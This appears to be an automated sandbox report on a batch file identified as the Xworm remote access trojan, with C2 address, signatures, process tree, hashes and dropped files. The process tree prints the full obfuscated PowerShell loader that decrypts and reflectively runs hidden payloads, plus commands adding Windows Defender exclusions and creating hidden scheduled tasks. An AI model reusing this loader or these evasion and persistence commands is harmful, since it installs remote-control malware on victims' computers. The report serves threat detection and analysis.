Overview

overview

10

Static

static

1

loaderv3.bat

windows7-x64

8

loaderv3.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/06/2024, 23:46

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    loaderv3.bat

  • Size

    300KB

  • MD5

    82ce24de6320cb72c527deda4c1637f9

  • SHA1

    aaebcf1e94c9ac15b129e2ad8aa89288fb4fa6f8

  • SHA256

    5ec787845e4c8569e81a28a415e6f0ff5b3ed9012f0cb30d1558adad98cd8680

  • SHA512

    c24fc762ec4b8dda569a502e93a3438460d8ecfacf83a5a2b9b0545338bd6369d861b56b9b96db0cb2e0914e751099be152fbc6d2cf018f15d7756a7e63ab048

  • SSDEEP

    6144:w4WQ1SbqrV+rICzcuHYMq6jBo/CDlcQOxS:w4WQ1SWx+r7vKgICDlcQ8S

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:7489

continue-silk.gl.at.ply.gg:7489
Attributes
  • Install_directory

    %ProgramData%

  • install_file

    steamwebhelper.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\loaderv3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xLde0JRLrIczMl9RxXziwroTVxq5HOanuhcsMouO6So='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8g2uqMTqX55+f+XUZTpqzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QupMx=New-Object System.IO.MemoryStream(,$param_var); $tyPSR=New-Object System.IO.MemoryStream; $UJjgx=New-Object System.IO.Compression.GZipStream($QupMx, [IO.Compression.CompressionMode]::Decompress); $UJjgx.CopyTo($tyPSR); $UJjgx.Dispose(); $QupMx.Dispose(); $tyPSR.Dispose(); $tyPSR.ToArray();}function execute_function($param_var,$param2_var){ $xhjgK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ilqWR=$xhjgK.EntryPoint; $ilqWR.Invoke($null, $param2_var);}$XSpOb = 'C:\Users\Admin\AppData\Local\Temp\loaderv3.bat';$host.UI.RawUI.WindowTitle = $XSpOb;$TBRhO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSpOb).Split([Environment]::NewLine);foreach ($EpZJp in $TBRhO) { if ($EpZJp.StartsWith(':: ')) { $nDory=$EpZJp.Substring(3); break; }}$payloads_var=[string[]]$nDory.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_444_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_444.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1540
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_444.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_444.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4052
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xLde0JRLrIczMl9RxXziwroTVxq5HOanuhcsMouO6So='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8g2uqMTqX55+f+XUZTpqzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QupMx=New-Object System.IO.MemoryStream(,$param_var); $tyPSR=New-Object System.IO.MemoryStream; $UJjgx=New-Object System.IO.Compression.GZipStream($QupMx, [IO.Compression.CompressionMode]::Decompress); $UJjgx.CopyTo($tyPSR); $UJjgx.Dispose(); $QupMx.Dispose(); $tyPSR.Dispose(); $tyPSR.ToArray();}function execute_function($param_var,$param2_var){ $xhjgK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ilqWR=$xhjgK.EntryPoint; $ilqWR.Invoke($null, $param2_var);}$XSpOb = 'C:\Users\Admin\AppData\Roaming\startup_str_444.bat';$host.UI.RawUI.WindowTitle = $XSpOb;$TBRhO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($XSpOb).Split([Environment]::NewLine);foreach ($EpZJp in $TBRhO) { if ($EpZJp.StartsWith(':: ')) { $nDory=$EpZJp.Substring(3); break; }}$payloads_var=[string[]]$nDory.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2088
            • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
              "C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe"
              6⤵
              • Executes dropped EXE
              PID:1168
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:712
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:836
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3208
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'steamwebhelper.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3308
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "steamwebhelper" /tr "C:\ProgramData\steamwebhelper.exe"
              6⤵
              • Creates scheduled task(s)
              PID:3468
  • C:\ProgramData\steamwebhelper.exe
    C:\ProgramData\steamwebhelper.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:3952

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\steamwebhelper.exe
          Filesize

          442KB

          MD5

          04029e121a0cfa5991749937dd22a1d9

          SHA1

          f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

          SHA256

          9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

          SHA512

          6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          aba273eeba4876ea41ee0e64b4cbb51d

          SHA1

          bef5f75b81cf27268dc0d0f30f00b022f9288db9

          SHA256

          67fc3f5c3407858793c6fac6131b0f340667ffc567fa76b43245ecf2621322c9

          SHA512

          23dc2f0cfc68194dcbf407a6528cf9f9a8aa89f4821be22413bde036ae5ca44144b568aa3160372b9741f3d0f5baa48dff8a8b582bdedc3ad3fb121af340c0ae

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          1cc5e033811a5d520bb4a6904b5c433b

          SHA1

          c159a342ed372790600b3a6ac97e274638a0ce9a

          SHA256

          9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

          SHA512

          dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          d28a889fd956d5cb3accfbaf1143eb6f

          SHA1

          157ba54b365341f8ff06707d996b3635da8446f7

          SHA256

          21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

          SHA512

          0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          da5c82b0e070047f7377042d08093ff4

          SHA1

          89d05987cd60828cca516c5c40c18935c35e8bd3

          SHA256

          77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

          SHA512

          7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pdhxiqhq.1bz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exe
          Filesize

          10KB

          MD5

          dc92dfb6ad8f341ee6869cf0b7a1841d

          SHA1

          fe31fab27044f5b5157d2c7f69af298cd18d2e0e

          SHA256

          ab03b81ae4fa28295ed1a521f138d35de71fa9fc4f45360fa501e570feaa5665

          SHA512

          23532a88ece65ddf82014e0be5872e7169799971e410ac4ab3fb88a7aa56bb49e1979adce3d08704ab5e24c11a373ea6a5c713344b577760a860f1fa6dd061a4

          Download Submit

        • C:\Users\Admin\AppData\Roaming\startup_str_444.bat
          Filesize

          300KB

          MD5

          82ce24de6320cb72c527deda4c1637f9

          SHA1

          aaebcf1e94c9ac15b129e2ad8aa89288fb4fa6f8

          SHA256

          5ec787845e4c8569e81a28a415e6f0ff5b3ed9012f0cb30d1558adad98cd8680

          SHA512

          c24fc762ec4b8dda569a502e93a3438460d8ecfacf83a5a2b9b0545338bd6369d861b56b9b96db0cb2e0914e751099be152fbc6d2cf018f15d7756a7e63ab048

          Download Submit

        • C:\Users\Admin\AppData\Roaming\startup_str_444.vbs
          Filesize

          115B

          MD5

          21d7226e9e6064f533d6d63465b40006

          SHA1

          b8087c56c121c535282253d2c32ea0d02e6c87ac

          SHA256

          69637f9ea555d52de5be30f4fc7986ce6b81a891d69de91d53365d98ef3cfe0e

          SHA512

          df86de9de89b3fb86e25ff219e896a10479dc35fe7e926a8dd1d24c96774811e3e9d28657636118ff1e4a043e92b1a4faebe324f38f5ac45a1d4ee548466c418

          Download Submit

        • memory/1168-62-0x0000000000040000-0x0000000000048000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1540-16-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1540-30-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1540-27-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1540-26-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2088-51-0x0000021CE6630000-0x0000021CE6648000-memory.dmp

          Filesize

          96KB

          Download

        • memory/3952-122-0x00000212F5CA0000-0x00000212F5D16000-memory.dmp

          Filesize

          472KB

          Download

        • memory/3952-121-0x00000212F5880000-0x00000212F58C4000-memory.dmp

          Filesize

          272KB

          Download

        • memory/4264-14-0x000001BAC1910000-0x000001BAC194C000-memory.dmp

          Filesize

          240KB

          Download

        • memory/4264-63-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4264-0-0x00007FF8003F3000-0x00007FF8003F5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4264-13-0x000001BAA91B0000-0x000001BAA91B8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/4264-12-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4264-11-0x00007FF8003F0000-0x00007FF800EB1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4264-1-0x000001BAA9600000-0x000001BAA9622000-memory.dmp

          Filesize

          136KB

          Download